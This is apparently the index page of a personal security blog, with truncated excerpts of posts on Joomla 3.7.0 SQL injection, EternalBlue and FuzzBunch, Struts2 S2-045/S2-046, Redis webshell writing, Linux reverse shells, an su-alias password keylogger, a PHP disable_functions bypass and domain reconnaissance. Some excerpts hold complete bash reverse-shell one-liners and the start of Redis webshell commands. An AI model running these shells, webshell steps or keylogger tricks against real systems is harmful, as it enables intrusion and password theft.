Urahara Blog

一生想做浪漫极客

Joomla V3.7.0 核心组件SQL注入漏洞分析

SQL Injection Vulnerability in Joomla! 3.7

简介 在Joomla!3.7.0版本中新引入了一个组件“com_fields”,这个组件任何人都可以访问,无需登陆认证。但是由于程序员设计缺陷,从这个组建中导入了同名的后台管理员组件,而正好在这个后台的同名组建中由于对用户输入过滤不严格,导致严重SQL注入漏洞。 漏洞分析 问题组件的位置是在\joomla3.7.0\components\com_fields\,可以看出来是一个前台就可...

Smbtouch漏洞判断与FuzzBunch攻击说明

EternalRomance, Eternalchampion, Eternalblue and Eternalsynergy

简介 距离Shadow Brokers公布方程式泄漏的工具及漏洞已有两周多了,但是大家对泄漏内容的研究热情还是很高,说实话主要是料比较多。期间也有几个小伙伴问我关于Eternalchampion等其他漏洞的利用,网上炒的比较多的一直都是Eternalblue,我上一篇博文也是以Eternalblue来进行介绍的,所以就花点时间研究一下,整理各漏洞的利用方法供各位表哥参考,欢迎吐槽。 攻击...

Equation Group泄漏工具简单试用与MS17-010漏洞利用

Analysis of the Vulnerabilities

简介 Shadow Brokers周末公布的文件无疑对互联网造成了一次大地震,因为已经很久没有出现过像ms08-067这种级别的漏洞了,因此就被大家笑语说出了“指哪打哪”这样一个事实。而让人佩服的不仅是漏洞,还有泄漏出来的FuzzBunch攻击框架,但是这两天大家都是配合MSF来完成的漏洞利用,所以研究了一下自带的DanderSpritz工具,感觉也是挺震撼的。总之,个人觉得FuzzBun...

Apache Struts2 Remote Code Execution (S2-046)

Analysis of the Vulnerabilities

Versions Affected Struts 2.3.5 – Struts 2.3.31 Struts 2.5 – Struts 2.5.10 And you are using Jakarta based file upload Multipart parser Description s2-046这个漏洞其实和s2-045漏洞触发的本质是一样的,都使用了同一个异常处理方法,...

Apache Struts2 Remote Code Execution (S2-045)

Analysis of the Vulnerabilities

Versions Affected Struts 2.3.5 - Struts 2.3.31 Struts 2.5 - Struts 2.5.10 And you are using Jakarta based file upload Multipart parser Description It is possible to perform a RCE attack wit...

Redis Hacking Tips

collection

Get Webshell ​ You must know the physical path of the Web site root@Urahara:~# redis-cli -h 10.85.0.52 10.85.0.52:6379> config set dir /usr/share/nginx/html OK 10.85.0.52:6379> config set d...

Some Ways To Create An Interactive Shell On Linux

A little record|Continuously updated

Bash $ bash -i >& /dev/tcp/192.168.68.206/2333 0>&1 $ exec 196<>/dev/tcp/192.168.68.206/2333; sh <&196 >&196 2>&196 $ exec 5<>/dev/tcp/192.168.68.206...

Keyboard Logger On Linux - Part 1

Serial

alias su keylogger 在一个低权限用户目录下的.bashrc添加一句alias su=’/usr/root.py’,低权限用户su root后成功记录密码,但使用这种方法后管理员无法正常su切换至root用户下,所以比较容易被管理员发现。密码记录路径请看脚本。 #!/usr/bin/python # -*- coding: cp936 -*- import os, sy...

PHP Disabled_functions Bypass

bypass

PHP 5.x Shellshock Exploit # Exploit Title: PHP 5.x Shellshock Exploit (bypass disable_functions) # CVE: CVE-2014-6271 <pre> <?php echo "Disabled functions: ".ini_get('disable_functions')...

域渗透-信息收集基础

内网渗透-域环境

判断当前服务器是否在域内 RDS 如果目标服务器远程桌面服务开启,可尝试进行连接,若在用户名和密码栏下还有一个登录到(L)选项,下拉选项栏如果除了计算机名(此计算机)选项外还有其他选项,则此服务器可能位于域中,且选项名即为域名; net time /domain 执行该命令,有三种情况:第一种如果存在域会从域控返回时间,并在第一行返回域控及域名;第二种如...